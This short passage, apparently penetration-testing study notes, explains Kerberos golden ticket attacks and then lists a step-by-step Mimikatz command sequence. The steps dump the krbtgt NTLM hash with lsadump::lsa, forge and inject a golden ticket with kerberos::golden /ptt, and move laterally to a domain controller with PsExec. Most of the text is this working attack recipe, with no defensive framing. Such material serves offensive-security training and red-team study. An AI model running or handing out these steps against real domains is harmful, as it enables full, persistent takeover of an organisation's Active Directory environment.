Going back to the explanation of Kerberos authentication, we recall that when a user submits a request for a TGT, the KDC encrypts the TGT with a secret key known only to the KDCs in the domain. This secret key is actually the password hash of a domain user account called krbtgt. If we are able to get our hands on the krbtgt password hash, we could create our own self-made custom TGTs, or golden tickets

1. mimikatz.exe
2. privilege::debug
3. lsadump::lsa /patch
   to get krbtgt ntlm hash
4. kerberos::purge
5. kerberos::golden /user:<fakeuser> /domain:<domain> /sid:<sid> /krbtgt:<krbtgt ntlm hash> /ptt
6. misc::cmd
7. psexec.exe \\<dc_machine> cmd.exe With the golden ticket injected into memory, we can launch a new command prompt with misc::cmd and again attempt lateral movement with PsExec
8. whoami
9. whoami /group for verification